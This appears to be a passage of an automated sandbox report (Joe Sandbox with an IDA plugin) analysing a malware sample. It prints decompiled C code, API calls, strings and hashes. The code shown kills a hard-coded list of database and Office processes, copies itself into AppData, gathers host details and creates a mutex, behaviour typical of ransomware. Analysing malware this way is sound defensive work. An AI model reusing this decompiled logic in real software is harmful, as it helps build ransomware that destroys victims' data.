							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E0FE62960(_t57, _t75); // executed
					L17:
					ExitThread(0);
				}
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000800,00003000,00000040), ref: 0FE62AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FE62B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 0FE62B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 0FE62B7D

Part of subcall function 0FE682B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FE682CD
Part of subcall function 0FE682B0: VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000040), ref: 0FE682FB
Part of subcall function 0FE682B0: GetModuleHandleA.KERNEL32(?), ref: 0FE6834F
Part of subcall function 0FE682B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FE6835D
Part of subcall function 0FE682B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FE6836C
Part of subcall function 0FE682B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FE683B5
Part of subcall function 0FE682B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE683C3

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0FE62B9C
lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0FE62BE4
lstrcatW.KERNEL32(00000000,?), ref: 0FE62BEC
lstrcatW.KERNEL32(00000000,.exe), ref: 0FE62BF4
wsprintfW.USER32 ref: 0FE62C35
ExitThread.KERNEL32 ref: 0FE62C47

Strings

AppData, xrefs: 0FE62B97
\Microsoft\, xrefs: 0FE62BDE
"%s", xrefs: 0FE62C2F
.exe, xrefs: 0FE62BEE
P, xrefs: 0FE62B55
I, xrefs: 0FE62B6C
U, xrefs: 0FE62B75

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: 03705a8b2d424b2f3eedcd95e1bdddbc933cb8970167f0acfbced16ff0817c1c
Instruction ID: 87d813ce185a0209a437330387984369e6f948058075a4c53680cdd6a92f89da
Opcode Fuzzy Hash: 03705a8b2d424b2f3eedcd95e1bdddbc933cb8970167f0acfbced16ff0817c1c
Instruction Fuzzy Hash: D141D6706443089FE700DF21EC49B9B7BD9EFC8799F041429F645A6282EB78D904CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 0FE648C0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0FE648C0() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				void* _t49;
				void* _t50;
				int _t51;
				int _t52;
				int _t53;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
				_t70 = _t49;
				_v172 = _t70;
				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
				_t60 = _t50;
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70); // executed
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000); // executed
				}
				_t53 = FindCloseChangeNotification(_t72); // executed
				return _t53;
			}

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0FE64A32
VirtualAlloc.KERNELBASE(00000000,0000022C,00003000,00000004), ref: 0FE64A4C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0FE64A65
lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FE64A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FE64A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0FE64AA4
CloseHandle.KERNEL32(00000000), ref: 0FE64AB1
Process32NextW.KERNEL32(?,00000000), ref: 0FE64ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE64AE3
FindCloseChangeNotification.KERNELBASE(?), ref: 0FE64AEA

Strings

iqt, xrefs: 0FE64A85

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
String ID: iqt
API String ID: 3023235786-2805759263
Opcode ID: 46d2d8d589f4eca04ad32f4a05c1da75a5061d750b4f9e86328a1508386302a9
Instruction ID: da98943b1c48dccfaf92cd13bd5b9a9696052a101bd65f7b18de94449e88525f
Opcode Fuzzy Hash: 46d2d8d589f4eca04ad32f4a05c1da75a5061d750b4f9e86328a1508386302a9
Instruction Fuzzy Hash: 21516DB54893C89FC720CF11A44A74FBBE4FB827D9F506A1CE5985A252E7709C08CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0FE647D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringmemorysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0FE63BC0: GetProcessHeap.KERNEL32(?,?,0FE64807,00000000,?,00000000,00000000), ref: 0FE63C5C

Part of subcall function 0FE67490: VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0FE674B7
Part of subcall function 0FE67490: GetUserNameW.ADVAPI32(00000000,?), ref: 0FE674C8
Part of subcall function 0FE67490: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0FE674E6
Part of subcall function 0FE67490: GetComputerNameW.KERNEL32 ref: 0FE674F0
Part of subcall function 0FE67490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FE67510
Part of subcall function 0FE67490: wsprintfW.USER32 ref: 0FE67551
Part of subcall function 0FE67490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FE6756E
Part of subcall function 0FE67490: RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FE67592
Part of subcall function 0FE67490: RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0FE64810,?), ref: 0FE675B6
Part of subcall function 0FE67490: RegCloseKey.KERNELBASE(00000000), ref: 0FE675D2

Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672F2
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672FD
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67313
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6731E
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67334
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6733F
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67355
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(0FE64B36,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67360
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67376
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67381
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67397
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673A2
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673C1
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673CC

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6482C
lstrcpyW.KERNEL32 ref: 0FE6484F
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE64856
CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6486E
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6487A
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE64881
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6489B

Strings

Global\, xrefs: 0FE64849

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: 8ade5fbd32b5646cb994755ee3102efc622bbfa4668aa36dc21a5117a8a23854
Instruction ID: f921e2a95b14d772ec60e8fa88038fd8a8610278eb4376992921e7c4a0f2d148
Opcode Fuzzy Hash: 8ade5fbd32b5646cb994755ee3102efc622bbfa4668aa36dc21a5117a8a23854
Instruction Fuzzy Hash: 9021F371AE031D7BE224A724DC4AF7F7A5CDB41BD5F500228F605A60C1AE987D0487E5

Uniqueness

Uniqueness Score: -1.00%

Function 0FE64A78 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE64A78(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				int _t10;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000); // executed
					}
					_t10 = FindCloseChangeNotification(_t24); // executed
					return _t10;
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FE64A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FE64A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0FE64AA4
CloseHandle.KERNEL32(00000000), ref: 0FE64AB1
Process32NextW.KERNEL32(?,00000000), ref: 0FE64ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE64AE3
FindCloseChangeNotification.KERNELBASE(?), ref: 0FE64AEA

Strings

iqt, xrefs: 0FE64A85

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
String ID: iqt
API String ID: 3573210778-2805759263
Opcode ID: 140725673cc4ec452fb6c4845f08ed120af7d5578b75709fa0cead1a34f580bb
Instruction ID: 21ca624fd695217b617adbc757687268d452022c9c6b9d80cdc2190f15645c2e
Opcode Fuzzy Hash: 140725673cc4ec452fb6c4845f08ed120af7d5578b75709fa0cead1a34f580bb
Instruction Fuzzy Hash: E2014E32540108BFD7209F11EC84B9B736DEF827E2F310134FD09A6081FB34A8148BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0FE635C0 Relevance: 13.6, APIs: 9, Instructions: 94
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE635C0(intOrPtr __ecx, intOrPtr __edx) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				void* _t12;
				void* _t14;
				long _t17;
				void* _t18;
				int _t21;
				void* _t25;
				char* _t29;
				void* _t37;
				void* _t39;

				_v16 = __edx;
				_v20 = __ecx;
				_v12 = 0;
				_t12 = VirtualAlloc(0, 0xa00, 0x3000, 4); // executed
				_t39 = _t12;
				if(_t39 != 0) {
					GetModuleFileNameW(0, _t39, 0x100);
					_t14 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0, 0); // executed
					_t37 = _t14;
					if(_t37 != 0xffffffff) {
						_t17 = GetFileSize(_t37, 0);
						_v8 = _t17;
						_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
						_t25 = _t18;
						if(_t25 != 0) {
							_t21 = ReadFile(_t37, _t25, _v8,  &_v24, 0); // executed
							if(_t21 != 0) {
								_t29 = _v8 - 1 + _t25;
								if( *_t29 != 0) {
									do {
										_t29 = _t29 - 1;
									} while ( *_t29 != 0);
									E0FE634F0(_t29 + 1, _v20, _v16);
									_t32 =  !=  ? 1 : 0;
									_v12 =  !=  ? 1 : 0;
								}
							}
							VirtualFree(_t25, 0, 0x8000); // executed
						}
						FindCloseChangeNotification(_t37); // executed
					}
					VirtualFree(_t39, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t12;
				}
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000A00,00003000,00000004,?,74716980), ref: 0FE635E9
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100,747582B0), ref: 0FE63600
CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0FE63616
GetFileSize.KERNEL32(00000000,00000000), ref: 0FE63626
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 0FE63639
ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000), ref: 0FE6364C
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE6368D
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0FE63694
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE636A2

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocFree$ChangeCloseCreateFindModuleNameNotificationReadSize
String ID:
API String ID: 511603811-0
Opcode ID: ea65e1052e9181626f7fa8709067964a1c8917b5e09c4e955ef758ebb96a4546
Instruction ID: 5c35dac00c982c8e0717d2c492374179c9fc4c526f79eaf7792fe94a5ba5a694
Opcode Fuzzy Hash: ea65e1052e9181626f7fa8709067964a1c8917b5e09c4e955ef758ebb96a4546
Instruction Fuzzy Hash: F8210E71B803087FF7219B659C46FAF7B68EB45B65F200069F705B53C1CBB865108755

Uniqueness

Uniqueness Score: -1.00%

Function 0FE67D70 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE67D70(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67D89
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67D9B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67DAD
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67DBF
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67DD1
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67DE3
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67DF5
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67E07
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67E19
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FE648AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE67E31

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c085ba23aead450735bfb9afd643fe408f3a183e729907e584bf2f8f6b4e549c
Instruction ID: 515bc2235a112510ffd46c51caeabc62d265d0cfc90506e1af362303b654bdd8
Opcode Fuzzy Hash: c085ba23aead450735bfb9afd643fe408f3a183e729907e584bf2f8f6b4e549c
Instruction Fuzzy Hash: CC21DD30280B08AAE6761A15DC0AFA6B2A1BB40B89F65593CF2C1244F18FF57499DF04

Uniqueness

Uniqueness Score: -1.00%

Function 0FE67410 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE67410(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x0fe67426
0x0fe67430
0x0fe67484
0x0fe67432
0x0fe67435
0x0fe67447
0x0fe6744f
0x0fe67466
0x0fe6746f
0x0fe6747b
0x0fe67451
0x0fe67454
0x0fe67457
0x0fe67463
0x0fe67463
0x0fe6744f

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,0000060C,?,0FE67885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FE67426
RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000080,?,?,0FE67885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FE67447
RegCloseKey.KERNELBASE(?,?,0FE67885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FE67457
GetLastError.KERNEL32(?,0FE67885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FE67466
RegCloseKey.ADVAPI32(?,?,0FE67885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FE6746F

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: 1ffeb81f014a42bb520258f65561b69be78bef2884f3726033f77d8478a9b76a
Instruction ID: d67b081e9b3cec7b96a8616c8a3ff4e1913452b72062798442cd5b3a5e1e9d2f
Opcode Fuzzy Hash: 1ffeb81f014a42bb520258f65561b69be78bef2884f3726033f77d8478a9b76a
Instruction Fuzzy Hash: 9E012132A0011DFBCB509F95ED09DDB7F79EB057A6B004162FD05E6111D7329A34ABE0

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66550 Relevance: 2.5, APIs: 2, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

